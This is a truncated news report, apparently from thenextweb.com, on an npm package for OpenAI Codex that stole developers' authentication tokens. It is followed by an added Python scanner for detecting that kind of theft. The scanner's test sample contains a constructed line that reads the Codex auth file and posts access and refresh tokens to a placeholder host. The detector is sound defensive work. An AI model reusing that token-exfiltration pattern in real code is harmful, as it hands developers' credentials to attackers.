A popular OpenAI Codex tool with 29,000 weekly downloads has been quietly stealing developer tokens for a month


TL;DR

A popular npm package for OpenAI Codex with 29,000 weekly downloads has been stealing developer authentication tokens for a month. The same credential-theft chain also ran through two Android apps with over 60,000 combined downloads.

The npm package looked legitimate. It had an active GitHub repository, steady development history, and roughly 29,000 weekly downloads. For developers using OpenAI Codex, it offered exactly what it advertised: a remote web UI for the AI coding tool.

But for the past month, every invocation of codexui-android has also been silently reading the contents of the user’s Codex authentication file and shipping it to an attacker-controlled server. The stolen data includes access tokens, refresh tokens, ID tokens, and account IDs: everything needed to impersonate the developer indefinitely.

“The refresh_token doesn’t expire,” Aikido Security researcher Charlie Eriksen wrote. “An attacker holding it can silently impersonate you indefinitely.”
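An added defender-side check, not code from the article, from Aikido or from the package: a heuristic scan of installed package sources for the combination the article describes, a reference to the Codex authentication file together with an outbound network call. The auth file path (~/.codex/auth.json) and both sample sources are assumptions constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# Assumed location: the article names the "Codex authentication file" but not its path; ~/.codex/auth.json is an assumption.
AUTH_FILE_MARKERS = (".codex", "auth.json")
# Token fields the article says were exfiltrated.
TOKEN_FIELDS = ("access_token", "refresh_token", "id_token", "account_id")
# Common Node.js ways to send data off the machine (heuristic, not exhaustive).
NETWORK_RE = re.compile(r"\bfetch\s*\(|\bhttps?\.request\s*\(|\baxios\.|\bnet\.connect\s*\(")

def score_source(text: str) -> dict:
    """Flag JS that both references the Codex auth file and talks to the network."""
    reads_auth = all(marker in text for marker in AUTH_FILE_MARKERS)
    sends = bool(NETWORK_RE.search(text))
    return {
        "reads_codex_auth": reads_auth,
        "sends_network": sends,
        "token_fields": [f for f in TOKEN_FIELDS if f in text],
        "suspicious": reads_auth and sends,  # both together is the exfiltration shape
    }

def scan_tree(root: Path) -> list:
    """Return (relative path, score) for every suspicious .js file under root."""
    flagged = []
    for path in sorted(root.rglob("*.js")):
        score = score_source(path.read_text(errors="ignore"))
        if score["suspicious"]:
            flagged.append((str(path.relative_to(root)), score))
    return flagged

# Constructed samples standing in for package sources (not the real package's code).
SAMPLE_BENIGN = """
const cfg = JSON.parse(fs.readFileSync(path.join(os.homedir(), '.codex', 'auth.json')));
console.log('signed in as', cfg.account_id);  // read locally, never sent anywhere
"""
SAMPLE_SUSPICIOUS = """
const t = JSON.parse(fs.readFileSync(path.join(os.homedir(), '.codex', 'auth.json')));
fetch('https://collector.invalid/upload', { method: 'POST',
  body: JSON.stringify({ access_token: t.access_token, refresh_token: t.refresh_token }) });
"""

def demo() -> list:
    # Write both samples into a scratch tree (one package per directory) and scan it.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, src in (("good-pkg", SAMPLE_BENIGN), ("bad-pkg", SAMPLE_SUSPICIOUS)):
            (root / name).mkdir()
            (root / name / "index.js").write_text(src)
        return scan_tree(root)
```

Run `scan_tree(Path("node_modules"))` against a real project; a hit is a prompt for manual review, not proof of compromise, since a legitimate Codex front end may read the same file.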

How...

Copyright of this story solely belongs to thenextweb.com.
